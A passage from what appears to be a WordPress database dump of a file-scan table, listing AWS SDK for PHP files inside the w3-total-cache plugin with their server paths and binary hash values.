#ҹ{','',0,'?'),('cPcd\Zo\ZT','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTDeviceAdvisor/Exception/IoTDeviceAdvisorException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTDeviceAdvisor/Exception/IoTDeviceAdvisorException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l3Xy8','?Ձ0MRno%Jw','',0,'?'),('빍az#YBd-&PM','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTDeviceAdvisor/IoTDeviceAdvisorClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTDeviceAdvisor/IoTDeviceAdvisorClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G 3FKHl;','n=gA+Lkޡ\\TC','',0,'?'),('0\0$*ѦYāށm','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTEvents/Exception/IoTEventsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTEvents/Exception/IoTEventsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0$&\\*]J','J/Mu\"K{c1)Zͼbq','',0,'?'),('\ZLY%|Rs s','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTEvents/IoTEventsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTEvents/IoTEventsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5m]z+U','S)ceѢoDku ~z /','',0,'?'),('&el%][zA','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTEventsData/Exception/IoTEventsDataException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTEventsData/Exception/IoTEventsDataException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oa ]~v2','N3Df|j\0 ,\Zz-ʌv|','',0,'?'),('ԡHxrg','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTEventsData/IoTEventsDataClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTEventsData/IoTEventsDataClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}rIPl ',',>.T^ \r83-[','',0,'?'),('4bgd84','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTFleetHub/Exception/IoTFleetHubException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTFleetHub/Exception/IoTFleetHubException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','12(\"0Z5O','SGwbhJـGI67=','',0,'?'),('8+ߎsSJ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTFleetHub/IoTFleetHubClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTFleetHub/IoTFleetHubClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FhQ([','KZÝ\rh!rҔj\'=fAI \Z\r','',0,'?'),('؈Br桳>','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTJobsDataPlane/Exception/IoTJobsDataPlaneException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTJobsDataPlane/Exception/IoTJobsDataPlaneException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7B@T0+QJ4 ','jFPd\nUh\r;2ro.?20','',0,'?'),('Z,˧\0)o','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTJobsDataPlane/IoTJobsDataPlaneClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTJobsDataPlane/IoTJobsDataPlaneClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ײ7Sw)5','+TT\'\r8 LoTPb8','',0,'?'),(' ?ez>2','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTSecureTunneling/Exception/IoTSecureTunnelingException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTSecureTunneling/Exception/IoTSecureTunnelingException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ӦSn+UF','*,}\r/3!^P','',0,'?'),('{ߣ`3ٳBJ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTSecureTunneling/IoTSecureTunnelingClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTSecureTunneling/IoTSecureTunnelingClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LbFq뻀|X','[Pq1Ac8?\\$Q G05@v','',0,'?'),('z}#pݸxJi','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTSiteWise/Exception/IoTSiteWiseException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTSiteWise/Exception/IoTSiteWiseException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?4l\0;Kl','B\\bhe9*FN=O5','',0,'?'),('qV:}\"N;Ў','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTSiteWise/IoTSiteWiseClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTSiteWise/IoTSiteWiseClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' b=rO!','X[d7u]qGAd&WD|FҍL*:\rhA','',0,'?'),('6\0f ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTThingsGraph/IoTThingsGraphClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTThingsGraph/IoTThingsGraphClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vtHxR~ r ','QEC9|Sg- W\08u]','',0,'?'),('<ĸ\Z_','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTWireless/Exception/IoTWirelessException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTWireless/Exception/IoTWirelessException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(UICF4ΐ`','g:}Z\" we 3fn#L~','',0,'?'),('x0Bv\\% D2','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTWireless/IoTWirelessClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IoTWireless/IoTWirelessClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z(eʷ%)','.zs\'\0g\rzDx\r1','',0,'?'),('f\'K\\)a$a','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Iot/Exception/IotException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Iot/Exception/IotException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[ڭ]5PO5Ѵ','_uZw ~? wImЙO','',0,'?'),('Ygxg%)!M','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Iot/IotClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Iot/IotClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ğ⣥(YC','k\'Wgk^uAL\\nȯ','',0,'?'),('-4WF؄qq','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IotDataPlane/Exception/IotDataPlaneException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/IotDataPlane/Exception/IotDataPlaneException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{p=Z+X','h\\eڞrp~\0F \"x%,','',0,'?'),(']{$q','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Kafka/Exception/KafkaException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Kafka/Exception/KafkaException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fmI\n ','2@>flI rF?}','',0,'?'),('ӓuC]m','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Kafka/KafkaClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Kafka/KafkaClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ydjZJ4|P','FVsY%1jAx2a1','',0,'?'),('7NT>j\r','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Kinesis/Exception/KinesisException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Kinesis/Exception/KinesisException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' EFq͛SD͠i',']|`+Л>h7CCP⺜^','',0,'?'),('5|liG','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Kinesis/KinesisClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Kinesis/KinesisClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~0);3ȥԏ','Hǖ)\nG4\"Ȇ\ZқX(>W','',0,'?'),('^@wS','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisAnalytics/Exception/KinesisAnalyticsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisAnalytics/Exception/KinesisAnalyticsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kGO!{T','j2gqܟeA(,K 1:9','',0,'?'),('γ#2:48','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisAnalytics/KinesisAnalyticsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisAnalytics/KinesisAnalyticsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','PƇ]NL+Wk','#Z&< P8/=nPf t','',0,'?'),('; *,Y','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisAnalyticsV2/Exception/KinesisAnalyticsV2Exception.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisAnalyticsV2/Exception/KinesisAnalyticsV2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','к2?XѦ mr','ײXMf{ ` nO\"F|','',0,'?'),('^S!r~k&_','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisAnalyticsV2/KinesisAnalyticsV2Client.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisAnalyticsV2/KinesisAnalyticsV2Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H3Ż9~.nC','nxqn(WgRg! ','',0,'?'),('!v7ͽ^x','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisVideo/Exception/KinesisVideoException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisVideo/Exception/KinesisVideoException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','284+z','nJ METGGP*br','',0,'?'),('Q c3k','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisVideo/KinesisVideoClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisVideo/KinesisVideoClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!*YɝO\\\"','l!f2SlҊ,gDyfA8','',0,'?'),('9DLLE1','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisVideoArchivedMedia/Exception/KinesisVideoArchivedMediaException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisVideoArchivedMedia/Exception/KinesisVideoArchivedMediaException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E?vhL6 ','場\'+q jzf5*P\nm','',0,'?'),('\"=)4(C','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisVideoArchivedMedia/KinesisVideoArchivedMediaClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisVideoArchivedMedia/KinesisVideoArchivedMediaClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SiE?','[4/Lj7:4 \0\Za).1ۨHo?NfE!','',0,'?'),('\nUS+/+ͮ#','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisVideoMedia/Exception/KinesisVideoMediaException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisVideoMedia/Exception/KinesisVideoMediaException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','iu\rq\'˥x(_s4R5/\0','',0,'?'),('`!G&8','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisVideoMedia/KinesisVideoMediaClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisVideoMedia/KinesisVideoMediaClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%5m~cB','sڱVC-DjFۥ8zvd֊','',0,'?'),('Ӧ)X4${˽w','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisVideoSignalingChannels/Exception/KinesisVideoSignalingChannelsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisVideoSignalingChannels/Exception/KinesisVideoSignalingChannelsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7fOmCSh0','RS>9\n3@ϊm}֨0Q\ri%e','',0,'?'),('9v\"ռw),X','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisVideoSignalingChannels/KinesisVideoSignalingChannelsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/KinesisVideoSignalingChannels/KinesisVideoSignalingChannelsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XWV\ZMO','+OSe%u@ZINLRgR[}S#','',0,'?'),('*\"2f߫','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Kms/Exception/KmsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Kms/Exception/KmsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ި\rTD}Iv\0',' IB8toc?z5c]N%Q/','',0,'?'),('widX(\\Qd','',0,'?'),('Ç_oP/9`6֦u','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LexRuntimeV2/Exception/LexRuntimeV2Exception.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LexRuntimeV2/Exception/LexRuntimeV2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j)i|yO','[͌1CΝ^dUv|[z\"','',0,'?'),('QGW߶8','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LexRuntimeV2/LexRuntimeV2Client.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LexRuntimeV2/LexRuntimeV2Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' sE tOn_','$)O׍\Z\rvC=V?D','',0,'?'),('/OG^f- O','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LicenseManager/Exception/LicenseManagerException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LicenseManager/Exception/LicenseManagerException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>Y˼D o_y','7\"f{cr8sBm>','',0,'?'),('J~K4>>Ws','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LicenseManager/LicenseManagerClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LicenseManager/LicenseManagerClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qީ6 I+URc','{Lr!%ΊߕҎ@>9\r','',0,'?'),('6j,Ԃ%kbb:$KO!yhɎ7','',0,'?'),('r\"I,xU\nA*','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LookoutMetrics/Exception/LookoutMetricsException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LookoutMetrics/Exception/LookoutMetricsException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RB\"','0.?cu{4j7xM?x7','',0,'?'),('p |j)x','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LookoutMetrics/LookoutMetricsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LookoutMetrics/LookoutMetricsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(f%܇','diuuN\nŨ\\[P+op/ ','',0,'?'),('!r.NJ','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LookoutforVision/Exception/LookoutforVisionException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LookoutforVision/Exception/LookoutforVisionException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ܖXL! 31','>_>6rakI@jtOL','',0,'?'),('itBrRCe(Q','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LookoutforVision/LookoutforVisionClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LookoutforVision/LookoutforVisionClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','¯q-~r','K/Rp6fd.#**-5 ','',0,'?'),('jTlE','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LruArrayCache.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/LruArrayCache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FK8&PӴv ','',0,'?'),('iŲånb','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Macie/Exception/MacieException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Macie/Exception/MacieException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','p\rm|^筂jV','2t]g.@-#8{7o','',0,'?'),(' 8wB[\05','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Macie/MacieClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Macie/MacieClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+,38|%Y赌E',' ap\\| 8rEN?m%~U-ҷ@','',0,'?'),('،[w4','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Macie2/Exception/Macie2Exception.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Macie2/Exception/Macie2Exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W;CqÝA',' %O \'翠3h9g\ZGjDs','',0,'?'),('4Cjn)>&0\0ª','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Macie2/Macie2Client.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/Macie2/Macie2Client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LUھVb|WK','q}?P%B[j*a+ˢGgU','',0,'?'),('WX^T`vјW','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ManagedBlockchain/Exception/ManagedBlockchainException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ManagedBlockchain/Exception/ManagedBlockchainException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']zW/','+ĹF,7(j%#\'u','',0,'?'),('e0,U2\'\'','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ManagedBlockchain/ManagedBlockchainClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/ManagedBlockchain/ManagedBlockchainClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w8{P3a\\','!Kȩ1DpUFÔj=M\'hci','',0,'?'),('I9î','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceCatalog/Exception/MarketplaceCatalogException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceCatalog/Exception/MarketplaceCatalogException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}\n![KD.B;',':LxV[S֔@F$Ÿ','',0,'?'),('vUvf\'Nq','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceCatalog/MarketplaceCatalogClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceCatalog/MarketplaceCatalogClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Izf=\\','J҄~8&/guV-1.=e','',0,'?'),('$w&1o)_','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceCommerceAnalytics/MarketplaceCommerceAnalyticsClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceCommerceAnalytics/MarketplaceCommerceAnalyticsClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',!Z/ԧ',',akjB&CC-5Z>','',0,'?'),('s}㠞Dtgd','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceEntitlementService/Exception/MarketplaceEntitlementServiceException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceEntitlementService/Exception/MarketplaceEntitlementServiceException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tHum:m','Tf\ZB\0zǭ ^j)Lnv','',0,'?'),('uL\0\r:$','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceEntitlementService/MarketplaceEntitlementServiceClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceEntitlementService/MarketplaceEntitlementServiceClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vxfO) ִ','|:! V[{\"I|x','',0,'?'),('c(hLeo_}M','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceMetering/Exception/MarketplaceMeteringException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceMetering/Exception/MarketplaceMeteringException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(|AI1\Z','*u%.B\0k11HA','',0,'?'),('%\"% 0L','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceMetering/MarketplaceMeteringClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MarketplaceMetering/MarketplaceMeteringClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*\' JYg;G','d\Z_4 f%Mj{X','',0,'?'),('Y0:޸fr','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaConnect/Exception/MediaConnectException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaConnect/Exception/MediaConnectException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' Y;k0\0}',')GL׌\"eEDݨ0糅','',0,'?'),('sz(Sm\0,[','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaConnect/MediaConnectClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaConnect/MediaConnectClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W1R\Z+iR٢]*','1yҝpJ8VPXq\" ','',0,'?'),('\0~xd@kq','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaConvert/Exception/MediaConvertException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaConvert/Exception/MediaConvertException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z9c42a','5;|ɍ|\"W%uYI^eCp\"ar/]','',0,'?'),('1b','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaConvert/MediaConvertClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaConvert/MediaConvertClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OM,OK#0S&p','j~Hz1bZK,lR\\','',0,'?'),(' Oϑ4KÜi)','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaLive/Exception/MediaLiveException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaLive/Exception/MediaLiveException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V+\'Dhj','S,$/hYi~:: h ','',0,'?'),('lUZr<6','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaLive/MediaLiveClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaLive/MediaLiveClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2Ƣ',' eNjzZ97|}lkQ}Pk-','',0,'?'),('fO#=٦m','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaPackage/Exception/MediaPackageException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaPackage/Exception/MediaPackageException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P_v<\\?U{HY','NBO{> +MM Uifir','',0,'?'),('n}4Of\Z','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaPackage/MediaPackageClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaPackage/MediaPackageClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q`bm[/teۢD','V\ZJq<(޶\rʺoƾ$i]N','',0,'?'),('ӽl9F\"ZAoJ2','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaPackageVod/Exception/MediaPackageVodException.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaPackageVod/Exception/MediaPackageVodException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';`+ 2WX','cɒ@Fe/mS.cQ\Z ','',0,'?'),('*{8~a','wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaPackageVod/MediaPackageVodClient.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/w3-total-cache/vendor/aws/aws-sdk-php/src/MediaPackageVod/MediaPackageVodClient.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qsF9m\n[;','}-YF=N!r{C9 A','',0,'?'),('祉4РC 